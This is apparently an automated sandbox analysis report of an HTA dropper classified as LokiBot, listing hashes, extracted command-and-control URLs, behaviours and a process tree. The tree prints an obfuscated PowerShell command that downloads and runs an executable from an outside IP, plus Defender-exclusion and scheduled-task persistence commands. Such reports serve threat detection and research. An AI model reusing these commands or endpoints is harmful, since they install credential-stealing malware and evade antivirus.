Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 07:06
Static task
static1
Behavioral task
behavioral1
Sample
greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
Resource
win10v2004-20241007-en
General
-
Target
greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
-
Size
178KB
-
MD5
4ce3b0e612e1968b6c491ab1ab818884
-
SHA1
cbc890a816e9b7e993c90fb63d51526a76616323
-
SHA256
a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0
-
SHA512
9b87141b10a2e781e51483dced485817aeb34b545f6dbf64803b4b3621cd4dd74587a5033ab1aa3b931fbd39bc7c77650a0ccdd6b4132b48fbeab9d0fbb3d816
-
SSDEEP
96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q
Malware Config
Extracted
lokibot
http://94.156.177.41/simple/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1616 pOweRShelL.EXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2952 powershell.exe 2972 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 1616 pOweRShelL.EXe 2468 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2652 caspol.exe 2332 caspol.exe -
Loads dropped DLL 3 IoCs
pid Process 1616 pOweRShelL.EXe 1616 pOweRShelL.EXe 1616 pOweRShelL.EXe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2652 set thread context of 2332 2652 caspol.exe 44 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caspol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOweRShelL.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1440 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1616 pOweRShelL.EXe 2468 powershell.exe 2652 caspol.exe 2952 powershell.exe 2972 powershell.exe 2652 caspol.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1616 pOweRShelL.EXe Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 2652 caspol.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2972 powershell.exe Token: SeDebugPrivilege 2332 caspol.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 1700 wrote to memory of 1616 1700 mshta.exe 30 PID 1700 wrote to memory of 1616 1700 mshta.exe 30 PID 1700 wrote to memory of 1616 1700 mshta.exe 30 PID 1700 wrote to memory of 1616 1700 mshta.exe 30 PID 1616 wrote to memory of 2468 1616 pOweRShelL.EXe 32 PID 1616 wrote to memory of 2468 1616 pOweRShelL.EXe 32 PID 1616 wrote to memory of 2468 1616 pOweRShelL.EXe 32 PID 1616 wrote to memory of 2468 1616 pOweRShelL.EXe 32 PID 1616 wrote to memory of 2804 1616 pOweRShelL.EXe 33 PID 1616 wrote to memory of 2804 1616 pOweRShelL.EXe 33 PID 1616 wrote to memory of 2804 1616 pOweRShelL.EXe 33 PID 1616 wrote to memory of 2804 1616 pOweRShelL.EXe 33 PID 2804 wrote to memory of 2240 2804 csc.exe 34 PID 2804 wrote to memory of 2240 2804 csc.exe 34 PID 2804 wrote to memory of 2240 2804 csc.exe 34 PID 2804 wrote to memory of 2240 2804 csc.exe 34 PID 1616 wrote to memory of 2652 1616 pOweRShelL.EXe 37 PID 1616 wrote to memory of 2652 1616 pOweRShelL.EXe 37 PID 1616 wrote to memory of 2652 1616 pOweRShelL.EXe 37 PID 1616 wrote to memory of 2652 1616 pOweRShelL.EXe 37 PID 2652 wrote to memory of 2952 2652 caspol.exe 38 PID 2652 wrote to memory of 2952 2652 caspol.exe 38 PID 2652 wrote to memory of 2952 2652 caspol.exe 38 PID 2652 wrote to memory of 2952 2652 caspol.exe 38 PID 2652 wrote to memory of 2972 2652 caspol.exe 40 PID 2652 wrote to memory of 2972 2652 caspol.exe 40 PID 2652 wrote to memory of 2972 2652 caspol.exe 40 PID 2652 wrote to memory of 2972 2652 caspol.exe 40 PID 2652 wrote to memory of 1440 2652 caspol.exe 42 PID 2652 wrote to memory of 1440 2652 caspol.exe 42 PID 2652 wrote to memory of 1440 2652 caspol.exe 42 PID 2652 wrote to memory of 1440 2652 caspol.exe 42 PID 2652 wrote to memory of 2332 2652 caspol.exe 44 PID 2652 wrote to memory of 2332 2652 caspol.exe 44 PID 2652 wrote to memory of 2332 2652 caspol.exe 44 PID 2652 wrote to memory of 2332 2652 caspol.exe 44 PID 2652 wrote to memory of 2332 2652 caspol.exe 44 PID 2652 wrote to memory of 2332 2652 caspol.exe 44 PID 2652 wrote to memory of 2332 2652 caspol.exe 44 PID 2652 wrote to memory of 2332 2652 caspol.exe 44 PID 2652 wrote to memory of 2332 2652 caspol.exe 44 PID 2652 wrote to memory of 2332 2652 caspol.exe 44 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tkwfij9z.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAC8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBAC7.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2240
-
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3968.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1440
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2332
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD521338b2aeeb1156f1f985bf5d5fb473b
SHA1a1034b92ca93db96cd829ddba9673b70991bb0b6
SHA2567c70a43cb170fff6bc994bde04cca1c8fc2fcd585ae1360144b101f3f7b2c69f
SHA512e5d43578ed3ae9093a3f1a853249efd13940a8b8ce3a67f544ea1fe47958c1ed664e8d49cbcc7822a6772c285a6611c5cc84cd22773eecded1140b16a46dedf8
-
Filesize
3KB
MD56d68363059489c35ebdc3d36f6a0fe44
SHA1a92da60b7618d5b9c396d4a862514d6781611253
SHA2568beaaa85f68f9bdf4c350459bcadd52a41d008155500b90e597ffb9d06bef15d
SHA5128c895697f81af9ab214fb9f4d85bbb280720746d32acbbb7975c7851bb74b56a59e726c8fe6d156929930bde2afa4b19260bb58777989b33efa7e42528c9ef3c
-
Filesize
7KB
MD5a67c49fbdfe9787a76ca5d64eab3cebf
SHA1850ffe150609299a3314d497f9a92de99d2afb1d
SHA25665742d85cf3cecf2ad45bb70083b21a8e87d74f8ce9412e41be948758bf42bec
SHA5122da2b55a91439784d0d80a7d68581d5ebe4573258456af9df67372b7708b661da0440351cf9a89b598da889a73ec184d9558ffaa8757497905fa7307d4ed350b
-
Filesize
1KB
MD513b857ff2578c4b1c624038e5958781e
SHA10415ad5d2cb036c93992f619ea37c8c36e493a6e
SHA256fec5fd69bd55e38324b5f499edc53983ad3b2d62daa92a98d5fc2e520d62c605
SHA512b2a77093c8e0193f62490fe99dedde9ca1695895f4d3602eebfe10bf43fe6addaf36c470c3ebeacc7fd690f9215dba8499b2eaac6891fb99c9ebd86e5a2ec2d8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3551809350-4263495960-1443967649-1000\0f5007522459c86e95ffcc62f32308f1_5a410d66-f84f-4a6b-9b29-3982febe58d9
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3551809350-4263495960-1443967649-1000\0f5007522459c86e95ffcc62f32308f1_5a410d66-f84f-4a6b-9b29-3982febe58d9
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5f1e80640e8a0187497e1838e7d94b811
SHA1fb296781cf1176f60f263dc7d269212bd8c725f8
SHA2564736f8e29f003d597b5e7419717e932e4ff6fb1c0cc9dc7dd12415e72020c870
SHA51282f5d56b325bed0754b740345eae42d502872886bceb036b8c01c815710a5f2061172c7695335b34013d7c4230c3e7c15cee4f7b942bd2c9bc8688736157a8aa
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5f0d56bd325f00b9f4d249fdbc43197ed
SHA1679056d3466ff0daab54c8de64211c9db358272d
SHA2560b8907d9e25c150bd1e910c9ffef8f1f22836661c2b1843c3ccc1adfed095d17
SHA512112a1a2a59884f86fa3ff8e2be6865d147cdab0d92e9eb5ab60f11a62a81a1975cf862beea23a6a128181d09f7f8ad494691c4f35a7c4901fe96b2ddce946961
-
Filesize
586KB
MD574061922f1e78c237a66d12a15a18181
SHA1e31ee444aaa552a100f006e43f0810497a3b0387
SHA25689bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c
SHA512306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136
-
Filesize
652B
MD523e875266d9fbd13b3bb886ded9283fb
SHA1d298b7c5b493457396b0f585a7866a6870c49683
SHA2568c5ff1f2053cc1fd532804129da5f537f11e2e50e090d20ed3fa0f2fb9d9c98b
SHA5127f3b2980d63b7185d0e02f8b179392d04259880144355e104764a46ee11296c2bdf8529756ec780d052cb0d7f6625934bf66cdd9df9478ec9e3cc2df61689e25
-
Filesize
484B
MD5fe82050659a8b97690d60529499222c1
SHA17cc50135852b46dd1e36f2ff98506613db525a68
SHA25664c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a
SHA51259356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f
-
Filesize
309B
MD522b1b3ee8c0bd3ae266cc34c9dae263e
SHA10f02a317ee0d11f9cc3f24dd5885b018a88c1f53
SHA2563ffebb77a56f21489cf2c118bef3479f35cafcafa5a22d0df1266ea7c1d56b45
SHA512ea0052e2211e3929d078e9400eb81b54f11ffff33dd29c791bf60c709924b9d2e41675c80e5666a53cafa86445527138762c4b8884c816886cd41a1f31cdea44